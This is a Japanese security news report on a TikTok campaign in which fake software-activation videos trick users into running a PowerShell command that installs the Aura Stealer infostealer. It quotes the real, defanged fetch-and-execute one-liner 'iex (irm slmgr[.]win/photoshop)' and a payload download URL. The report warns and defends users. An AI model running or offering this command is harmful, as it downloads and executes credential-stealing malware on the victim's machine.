TikTok 動画が偽のソフトウェア ガイドを介して Aura Stealer を拡散

サイバー犯罪者は、人気ソフトウェアの無料アクティベーション ガイドであると偽ってビデオを使用し、TikTok 上のキャンペーンを通じて情報を盗むマルウェアを配布しています。 2025 年 10 月 19 日に確認された進行中の作戦は、ソーシャル エンジニアリング手法を使用してユーザーをだまして自分のコンピューターを感染させます。 ISCハンドラーのザビエル・メルテンス氏はこのキャンペーンを報告し、トレンドマイクロが5月に観察した作戦との類似点を指摘した。 TikTok ビデオは、Windows、Microsoft 365、Adobe Premiere、Photoshop、CapCut Pro、Discord Nitro などの正規のソフトウェアをアクティベートする手順を提供すると称しています。このキャンペーンでは、より幅広い視聴者を誘致するために、「Netflixプレミアム」や「Spotifyプレミアム」などの捏造されたサービスも宣伝している。この攻撃手法は ClickFix 攻撃として知られており、ユーザーをだまして悪意のあるコマンドを実行させる一見有益な指示を提供します。ビデオでは、短い 1 行の PowerShell コマンドが表示され、管理者権限でそれを実行するように視聴者に指示されます。示されているコマンドの例は、 iex (irm slmgr[.]win/photoshop)。 「photoshop」など、URL 内の特定のプログラム名は、ビデオ内で偽装されているソフトウェアに一致するように変更されます。ユーザーがこのコマンドを実行すると、PowerShell はリモート サイトに接続します slmgr[.]win。このアクションは 2 番目の PowerShell スクリプトを取得して実行し、Cloudflare ページから 2 つの実行可能ファイルをダウンロードします。最初のファイルは次からダウンロードされます https://file-epq[.]pages[.]dev/updater.exe、Aura Stealer マルウェアの亜種です。 Aura Stealer は、Web ブラウザ、認証 Cookie、暗号通貨ウォレット、および他のアプリケーションからのログイン データから保存された認証情報を収集するように設計されています。この盗まれた情報は攻撃者にアップロードされ、被害者のアカウントへのアクセスが許可されます。 2 番目のペイロードの名前は、 source.exeもダウンロードされます。この実行可能ファイルは、.NET Framework の組み込み Visual C# コンパイラ (csc.exe) を使用してコードをセルフコンパイルするために使用されます。その後、コンパイルされたコードがメモリに直接挿入されて起動されます。この 2 番目のペイロードの具体的な目的はまだ決定されていません。これらのビデオの指示に従っているユーザーは、自分の資格情報がすべて侵害されていると考え、使用するすべての Web サイトとオンライン サービスのパスワードを直ちにリセットすることをお勧めします。 ClickFix 攻撃は、過去 1 年間で大幅に一般的になりました。これらは、ランサムウェアや仮想通貨盗難に関連するキャンペーンでさまざまなマルウェア株を配布するために使用されます。一般的なセキュリティ慣行として、ユーザーは Web サイトからテキストをコピーして、ファイル エクスプローラーのアドレス バー、コマンド プロンプト、PowerShell、macOS ターミナル、Linux シェルなどのオペレーティング システムのダイアログ ボックスで実行しないでください。

Source: TikTok 動画が偽のソフトウェア ガイドを介して Aura Stealer を拡散